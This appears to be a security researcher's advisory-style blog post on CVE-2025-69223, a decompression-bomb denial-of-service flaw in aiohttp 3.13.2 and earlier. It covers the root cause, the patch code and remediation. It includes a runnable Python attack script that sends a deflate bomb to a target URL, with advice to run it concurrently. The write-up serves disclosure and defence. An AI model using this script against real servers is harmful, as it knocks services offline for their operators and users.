CVE-2025-69223

Puff, The Magic Dragon: Exploding RAM with aiohttp Zip Bombs

Amit Schendel
Senior Security Researcher

Jan 6, 2026 · 6 min read

Executive Summary (TL;DR)

aiohttp versions <= 3.13.2 failed to cap the output size of decompressed request bodies. By sending a small, highly compressed payload (gzip, deflate, brotli), an attacker can force the server to allocate gigabytes of memory, triggering an OOM crash and Denial of Service.

A classic 'Zip Bomb' vulnerability in the popular Python aiohttp framework allowing unauthenticated attackers to exhaust server memory via highly compressed payloads.

The Hook: Infinite Scalability (Until It Isn't)

Asynchronous Python frameworks like aiohttp are built on a promise: they handle thousands of concurrent connections efficiently by not blocking the event loop. They are the workhorses of the modern Python web ecosystem, powering everything from microservices to massive APIs. But there's a delicate balance in async land—resources are shared. If one request decides to eat the entire buffet, everyone else starves.

Enter CVE-2025-69223. This isn't some complex race condition or a subtle cryptographic failure. It is a blast from the past, a vulnerability so old school it belongs in a museum alongside the Morris Worm: the Zip Bomb (or Decompression Bomb).

The flaw lies in how aiohttp handled incoming requests with Content-Encoding headers. In its eagerness to be helpful, the framework would automatically decompress payloads—gzip, deflate, brotli, you name it—before handing the data to your application code. The problem? It trusted the client implicitly. It didn't ask, "Hey, how big is this thing going to get?" It just started pumping air into the balloon until the balloon (your RAM) popped.

The Flaw: Allocation Without Representation

The root cause, technically speaking, is CWE-409: Improper Handling of Highly Compressed Data. When a web server receives a request with a header like Content-Encoding: gzip, it assumes the client is sending compressed data to save bandwidth. The server's job is to inflate that data back to its original form so the application logic can read it.

In aiohttp versions 3.13.2 and older, the HTTPParser delegated this task to various decompressor objects (like DeflateBuffer for gzip/deflate). These buffers were implemented as effectively infinite sinks. The logic was roughly:

  1. Receive chunk of compressed bytes.

  2. Pass chunk to decompress().

  3. Append result to the buffer.

  4. Repeat until done.

Crucially, there was no check on the size of the output buffer. Compression algorithms like Deflate (used in gzip) have extremely high compression ratios for repetitive data. A string of 64MB of zeros can be compressed down to a few kilobytes. If an attacker sends a 50KB payload that expands to 5GB, aiohttp would dutifully attempt to allocate that 5GB in RAM. In a synchronous server, this crashes one thread. In an async server like aiohttp, blocking the main thread or exhausting memory crashes the entire application instance.
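The asymmetry is easy to demonstrate with Python's own zlib module. This quick sketch compresses 64 MB of zero bytes and prints the ratio (exact numbers will vary slightly by zlib version):

```python
import zlib

# 64 MB of zero bytes: about as compressible as data gets
original = b"\x00" * (64 * 1024 * 1024)

# Maximum compression level (9) shrinks it to a few tens of KB
compressed = zlib.compress(original, level=9)

ratio = len(original) / len(compressed)
print(f"original:   {len(original):>12,} bytes")
print(f"compressed: {len(compressed):>12,} bytes")
print(f"ratio:      {ratio:,.0f}:1")
```

Deflate tops out at roughly a 1000:1 ratio per stream, which is exactly why a payload measured in kilobytes on the wire can demand gigabytes of RAM on the server.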

The Code: The Smoking Gun

Let's look at the patch to understand the failure. The fix was implemented in commit 2b920c39002cee0ec5b402581779bbaaf7c9138a. The developers introduced a DEFAULT_MAX_DECOMPRESS_SIZE of 32MiB and enforced it rigorously.

Here is the vulnerable logic conceptualized versus the hardened version:

Before (The Infinite Loop)

In the old code, the DeflateBuffer would just keep writing to memory:

# pseudo-code of vulnerable logic
chunk = self.decompressor.decompress(data)
self.out_buffer.extend(chunk)
# No questions asked. If chunk is 10GB, we die.

After (The Guard Rails)

The patch introduces a strict max_length check during the decompression phase. Note the specific handling of the max_length parameter passed down to the underlying C libraries (via Python's zlib/brotli bindings) and the manual check afterwards.

# In aiohttp/http_parser.py
 
DEFAULT_MAX_DECOMPRESS_SIZE = 32 * 1024 * 1024  # 32 MiB
 
# ... inside the decompress logic ...
try:
    # They decompress with limit + 1 to detect overflow explicitly
    chunk = self.decompressor.decompress_sync(
        chunk, max_length=self._max_decompress_size + 1
    )
except Exception:
    raise ContentEncodingError(...)
 
# The Checkmate
if len(chunk) > self._max_decompress_size:
    raise DecompressSizeError(
        "Decompressed data exceeds the configured limit of %d bytes"
        % self._max_decompress_size
    )
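The same limit-plus-one pattern can be reproduced with the standard library alone. The sketch below is my own illustration, not aiohttp's code: it uses the max_length parameter of zlib's decompressor to cap the output, and treats receiving limit + 1 bytes as proof of overflow.

```python
import zlib

MAX_DECOMPRESS_SIZE = 1024  # 1 KiB cap, small for demo purposes

def bounded_decompress(data: bytes, limit: int = MAX_DECOMPRESS_SIZE) -> bytes:
    d = zlib.decompressobj()
    # Ask for at most limit + 1 bytes: if we get limit + 1 back,
    # the true output is strictly larger than the limit.
    out = d.decompress(data, limit + 1)
    if len(out) > limit:
        raise ValueError(f"decompressed data exceeds {limit} bytes")
    return out

# A tiny payload that inflates to 1 MB trips the guard
bomb = zlib.compress(b"A" * (1024 * 1024))
try:
    bounded_decompress(bomb)
except ValueError as e:
    print(f"rejected: {e}")

# A payload under the cap passes through untouched
print(bounded_decompress(zlib.compress(b"hello")))  # b'hello'
```

The key design point is that the limit is enforced *during* inflation, not after: the decompressor never materializes more than limit + 1 bytes, so the bomb is defused before it can allocate anything dangerous.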

[!NOTE] The fix also required bumping minimum versions for brotli and brotlicffi to ensure the underlying libraries actually respected the max_length parameter. This highlights that security fixes often cascade into dependency hell.

The Exploit: 42 Kilobytes of Doom

Exploiting this is trivial. You don't need shellcode or ROP gadgets; all you need is Python's zlib library and a malicious spirit.

The goal is to create a payload that is small on the wire (small enough to slip past WAF input-size limits, which typically check Content-Length) but massive once inflated in memory.

The Attack Script

import aiohttp
import zlib
import asyncio
 
async def nuke_server(target_url):
    # 1. Create the Bomb
    # 100MB of 'A's compresses to very little
    payload_size = 100 * 1024 * 1024  
    huge_data = b'A' * payload_size
    
    # Compress it. This will result in a small byte string (~100KB or less)
    compressed_data = zlib.compress(huge_data)
    
    print(f"Payload size on wire: {len(compressed_data)} bytes")
    print(f"Expanded size in RAM: {payload_size} bytes")
 
    # 2. Send the Payload
    # We lie and say it's just 'deflate' encoding.
    headers = {
        'Content-Encoding': 'deflate',
        'Content-Type': 'text/plain'
    }
 
    async with aiohttp.ClientSession() as session:
        try:
            # The server will try to inflate this back to 100MB
            await session.post(target_url, data=compressed_data, headers=headers)
        except Exception as e:
            print(f"Attack sent (expect disconnect): {e}")
 
if __name__ == "__main__":
    asyncio.run(nuke_server("http://localhost:8080/"))

If the target is running multiple workers, you simply run this loop concurrently. Sending 10 requests of a 1GB bomb = 10GB RAM usage instantly. The Linux OOM killer will wake up, choose violence, and terminate the python process. Service down.

The Impact: Why Async Makes It Worse

The impact here is a high-severity Denial of Service (DoS). While it doesn't offer Remote Code Execution (RCE), for many businesses, a downed API is just as expensive as a breached one.

What makes this particularly spicy in the context of aiohttp is the architecture. In a traditional threaded server (like Apache + mod_wsgi), one heavy request kills one thread. The other threads keep serving users. In an async reactor pattern (Python's asyncio), heavy CPU operations or massive memory allocations on the main loop cause "blocking".

Even before the OOM killer steps in, the mere act of allocating and writing gigabytes of data to RAM will freeze the event loop. Heartbeats will fail, other connections will time out, and the application becomes unresponsive. It is a very cheap attack (low bandwidth for attacker) with very high impact (resource exhaustion for defender).
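That loop-freezing effect can be observed directly with a small self-contained experiment (this is illustrative code, not aiohttp internals): a heartbeat coroutine measures its own scheduling gaps while a synchronous decompression of a 64 MB payload hogs the loop thread.

```python
import asyncio
import time
import zlib

gaps = []  # observed delay between heartbeat wakeups

async def heartbeat(interval: float = 0.01, ticks: int = 50):
    """A coroutine that should wake every ~10 ms on a healthy loop."""
    last = time.monotonic()
    for _ in range(ticks):
        await asyncio.sleep(interval)
        now = time.monotonic()
        gaps.append(now - last)
        last = now

async def main():
    hb = asyncio.create_task(heartbeat())
    await asyncio.sleep(0.1)  # let the heartbeat settle

    # A synchronous inflate runs on the event loop thread, so every
    # other coroutine (heartbeats, other requests) is frozen meanwhile.
    bomb = zlib.compress(b"\x00" * (64 * 1024 * 1024))
    zlib.decompress(bomb)

    await hb
    print(f"worst heartbeat gap: {max(gaps) * 1000:.0f} ms")

asyncio.run(main())
```

On a typical machine the worst gap jumps from ~10 ms to well over 100 ms for a mere 64 MB inflate; scale that to gigabytes and every connection on the loop is effectively dead.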

The Fix: Remediation

The remediation is straightforward, but it requires action. This is not a configuration change you can make in the vulnerable versions; code changes were required in the core library.

1. Patch Immediately

Update to aiohttp version 3.13.3 or higher.

pip install "aiohttp>=3.13.3"

2. Configuration Tuning

If your application legitimately needs to receive compressed payloads larger than 32MiB (the new default), you can adjust the limit. However, do so with extreme caution. Understand your physical memory constraints.

3. Defense in Depth

If your application does not expect compressed request bodies, you should block Content-Encoding headers at your reverse proxy (Nginx/HAProxy) or WAF level before the request even reaches the Python application. If you don't need it, turn it off.
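As one sketch of that proxy-level block, assuming a standard Nginx reverse proxy in front of the app (the upstream address is illustrative), you could reject any request that declares a compressed body before it ever reaches Python:

```nginx
server {
    listen 80;

    location / {
        # Reject requests that declare a compressed body outright;
        # $http_content_encoding is empty when the header is absent.
        if ($http_content_encoding) {
            return 415;  # Unsupported Media Type
        }
        proxy_pass http://127.0.0.1:8080;
    }
}
```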


Technical Appendix

CVSS Score
7.5 / 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Affected Systems

aiohttp <= 3.13.2

Affected Versions Detail

Product: aiohttp (aio-libs)
Affected Versions: <= 3.13.2
Fixed Version: 3.13.3

CWE: CWE-409 (Improper Handling of Highly Compressed Data)
CVSS: 7.5 (High)
Attack Vector: Network
Exploit Status: PoC Available
Impact: Denial of Service (DoS)
Patch: v3.13.3
CWE-409
Improper Handling of Highly Compressed Data

The software does not handle compressed data correctly, allowing an attacker to cause a denial of service by sending a small amount of data that decompresses to a very large amount.

Vulnerability Timeline

2026-01-03: Fix committed to master branch
2026-01-05: CVE-2025-69223 Published
2026-01-05: aiohttp v3.13.3 Released
